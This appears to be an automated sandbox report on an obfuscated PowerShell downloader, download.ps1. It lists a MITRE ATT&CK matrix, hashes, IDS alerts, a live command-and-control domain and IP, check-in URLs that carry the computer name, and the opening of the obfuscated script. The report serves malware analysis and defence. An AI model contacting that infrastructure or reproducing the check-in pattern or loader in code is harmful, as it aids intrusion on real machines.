Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		1
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps13%ReversingLabs
download.ps18%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://$vzploqw2791ibgs/$c7enaim3uwl25kr.php?id=$env:computername&key=$wybfhujxloid&s=5270%Avira URL Cloudsafe
http://$vzploqw2791ibgs/$c7enaim3uwl25kr.php?0%Avira URL Cloudsafe
http://crl.micrl/produc40%Avira URL Cloudsafe
http://crl.micr0%Avira URL Cloudsafe
http://gajaechkfhfghal.top100%Avira URL Cloudmalware
http://crl.mic#0%Avira URL Cloudsafe
http://www.google.com80%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.251.32.100
truefalse
    		high
    gajaechkfhfghal.top
    		45.61.136.138
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaEMDcGOKYwLsGIjDmmjf5RfoXynhsHLU9-5UL4EauT7WlP0WR6aChLaO330w5Xq2eIOSGTJIBpqQdPEUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
        		high
        http://www.google.com/false
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://$vzploqw2791ibgs/$c7enaim3uwl25kr.php?id=$env:computername&key=$wybfhujxloid&s=527powershell.exe, 00000000.00000002.14076096345.000001FB80E07000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.14095960690.000001FB90075000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://crl.micrl/produc4powershell.exe, 00000000.00000002.14107869531.000001FBF8B70000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://gajaechkfhfghal.toppowershell.exe, 00000000.00000002.14076096345.000001FB812FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB80BCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB8107C000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://www.google.com8powershell.exe, 00000000.00000002.14076096345.000001FB80D83000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://crl.mic#powershell.exe, 00000000.00000002.14107262863.000001FBF882F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://go.micropowershell.exe, 00000000.00000002.14076096345.000001FB81F1D000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.14076096345.000001FB812FA000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 00000000.00000002.14095960690.000001FB90075000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Iconpowershell.exe, 00000000.00000002.14095960690.000001FB90075000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://$vzploqw2791ibgs/$c7enaim3uwl25kr.php?powershell.exe, 00000000.00000002.14076096345.000001FB80E07000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.google.com/&q=EgSaEMDcGOKYwLsGIjDmmjf5RfoXynhsHLU9-5UL4EauT7WlP0WR6aChLaO330w5Xq2eIOSGTJIpowershell.exe, 00000000.00000002.14076096345.000001FB81316000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/recaptcha/api.jspowershell.exe, 00000000.00000002.14076096345.000001FB812FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB81328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB80D94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB81316000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/powershell.exe, 00000000.00000002.14095960690.000001FB90075000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.14095960690.000001FB90075000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.google.compowershell.exe, 00000000.00000002.14076096345.000001FB812FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB80D83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB81316000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.quovadis.bm0powershell.exe, 00000000.00000002.14103932163.000001FBF843F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/PesterXzpowershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.14076096345.000001FB80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaEMDcGOKYwLsGIjDmmjf5RfoXynhspowershell.exe, 00000000.00000002.14076096345.000001FB812FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB80D83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.14103932163.000001FBF843F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crl.micrpowershell.exe, 00000000.00000002.14107869531.000001FBF8B70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14105089144.000001FBF85C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.14076096345.000001FB80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        142.251.32.100
                                                        		www.google.comUnited States
                                                        		15169GOOGLEUSfalse
                                                        45.61.136.138
                                                        		gajaechkfhfghal.topUnited States
                                                        		40676AS40676USfalse

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1581678
                                                        Start date and time:2024-12-28 15:31:58 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 5m 37s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                        Run name:Suspected VM Detection
                                                        Number of analysed new started processes analysed:4
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:download.ps1
                                                        Detection:MAL
                                                        Classification:mal80.evad.winPS1@2/7@2/2
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 13
                                                        • Number of non-executed functions: 2
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .ps1
                                                        • Stop behavior analysis, all processes terminated

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.43.85.43
                                                        • Excluded domains from analysis (whitelisted): www.bing.com, ctldl.windowsupdate.com
                                                        • Execution Graph export aborted for target powershell.exe, PID 5180 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtCreateKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        09:34:07API Interceptor24x Sleep call for process: powershell.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/fw59ib1u2yhtr.php?id=computer&key=64956393081&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/yfshl0dga3htr.php?id=user-PC&key=122775442322&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/6v28jh9yqnhtr.php?id=computer&key=74624839462&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/s7rtm36opvhtr.php?id=computer&key=10840995318&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/26te7apny8htr.php?id=user-PC&key=60099241868&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/fm2yw8l13shtr.php?id=user-PC&key=91595968094&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/zm520bcoi4htr.php?id=computer&key=77853249548&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/wzlym6vt7ahtr.php?id=computer&key=78042689494&s=527

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        gajaechkfhfghal.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                        • 45.34.255.95

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:@...e...........................................................

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqkh00sy.tnc.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fycaey5d.ez0.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqizsjk5.w3l.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v44zko5d.m3u.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6222
                                                        Entropy (8bit):3.7376583061731075
                                                        Encrypted:false
                                                        SSDEEP:96:GUmLjL1CIqGfvkvhkvCCtNONzIBHmONzI0Hb:py/dh7AN05N0+
                                                        MD5:F4F16DE160685770A147851FAC0B6AA9
                                                        SHA1:174F38612A5A50639DFE863CFFB8C7627029EF13
                                                        SHA-256:4C80D629F6DF439C182A9B382DF3B176CF365FA64101E72B6BBA5B70ADE7982B
                                                        SHA-512:B0DB076ACD3C04C5897923D5F803E10759547BC7724E42A430D0E5535A2E9B3DA7788BA6482E87BB9871E1FCF4835DC6722AC25838161E9DDA1D501F95BC5105
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ...;.}.S...*.\.5Y..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...(?..5Y....`.5Y......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y8t....B......................A!.A.p.p.D.a.t.a...B.V.1......Y<t..Roaming.@......"S.Y<t....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y8t....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y6D..Windows.@......"S.Y6D....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y.B....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y.B....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.YdA....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.YDt....i...........

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5K2N4SRB5SCNVL749WTZ.temp

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6222
                                                        Entropy (8bit):3.7376583061731075
                                                        Encrypted:false
                                                        SSDEEP:96:GUmLjL1CIqGfvkvhkvCCtNONzIBHmONzI0Hb:py/dh7AN05N0+
                                                        MD5:F4F16DE160685770A147851FAC0B6AA9
                                                        SHA1:174F38612A5A50639DFE863CFFB8C7627029EF13
                                                        SHA-256:4C80D629F6DF439C182A9B382DF3B176CF365FA64101E72B6BBA5B70ADE7982B
                                                        SHA-512:B0DB076ACD3C04C5897923D5F803E10759547BC7724E42A430D0E5535A2E9B3DA7788BA6482E87BB9871E1FCF4835DC6722AC25838161E9DDA1D501F95BC5105
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ...;.}.S...*.\.5Y..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...(?..5Y....`.5Y......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y8t....B......................A!.A.p.p.D.a.t.a...B.V.1......Y<t..Roaming.@......"S.Y<t....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y8t....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y6D..Windows.@......"S.Y6D....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y.B....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y.B....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.YdA....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.YDt....i...........

                                                        Static File Info

                                                        General

                                                        File type:ASCII text, with very long lines (10919), with CRLF line terminators
                                                        Entropy (8bit):5.997476704622762
                                                        TrID:
                                                          File name:download.ps1
                                                          File size:19'850 bytes
                                                          MD5:9616cd49c942d68e9ca060039e8f1a5a
                                                          SHA1:2c2279f2b1699a4289d863ad18927760f3f72f69
                                                          SHA256:f1bdcf83f4d16a253f1318895e44e4b9e3ae477c37d177d58a68b27df0e84510
                                                          SHA512:798546c31e947f8e885a83b7427409f69b4247e6a5ccdfcd55aab05f92786dc7d528498dca94104532116f591f97b0c96451d0c14447f42c252cff4d80d42857
                                                          SSDEEP:384:6elufKxUuLnAYV/+kyXD6RG/fIeqYDw1k3uOq6W1wvRrEyEsQ9lwbRt1LIh0jl7:PitUnzD2QeqG+O8jyEsQ9a31LIhy
                                                          TLSH:28926DB57349E8D2C196CA3A7E437C283752B537C2DFADC4BF99D6C6B2602006E49C81
                                                          File Content Preview:$ipfdub=$executioncontext;$onestionaranonattiontionreorareran = (-JOiN (@((4271-(20617584/(885+(-3203+7206)))),(-1991+(11061-9018)),(581685/(13555-3350)),(-5194+(-3082+8326)),(-7258+(3243+4071)),(-1755+(3339414/(-3047+(1653834/338)))),(557424/9954),(-6586

                                                          File Icon

                                                          Icon Hash:3270d6baae77db44

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-12-28T15:34:10.069015+01002859405ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.11.20588981.1.1.153UDP
                                                          2024-12-28T15:34:10.597350+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.11.204974545.61.136.13880TCP
                                                          2024-12-28T15:34:10.597350+01002057741ET MALWARE TA582 CnC Checkin1192.168.11.204974545.61.136.13880TCP
                                                          2024-12-28T15:34:11.181340+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.11.2049746142.251.32.10080TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 28, 2024 15:34:10.186019897 CET4974580192.168.11.2045.61.136.138
                                                          Dec 28, 2024 15:34:10.347084045 CET804974545.61.136.138192.168.11.20
                                                          Dec 28, 2024 15:34:10.347278118 CET4974580192.168.11.2045.61.136.138
                                                          Dec 28, 2024 15:34:10.350202084 CET4974580192.168.11.2045.61.136.138
                                                          Dec 28, 2024 15:34:10.511415005 CET804974545.61.136.138192.168.11.20
                                                          Dec 28, 2024 15:34:10.544660091 CET804974545.61.136.138192.168.11.20
                                                          Dec 28, 2024 15:34:10.597349882 CET4974580192.168.11.2045.61.136.138
                                                          Dec 28, 2024 15:34:10.642157078 CET4974680192.168.11.20142.251.32.100
                                                          Dec 28, 2024 15:34:10.736716032 CET8049746142.251.32.100192.168.11.20
                                                          Dec 28, 2024 15:34:10.736881971 CET4974680192.168.11.20142.251.32.100
                                                          Dec 28, 2024 15:34:10.737001896 CET4974680192.168.11.20142.251.32.100
                                                          Dec 28, 2024 15:34:10.831465960 CET8049746142.251.32.100192.168.11.20
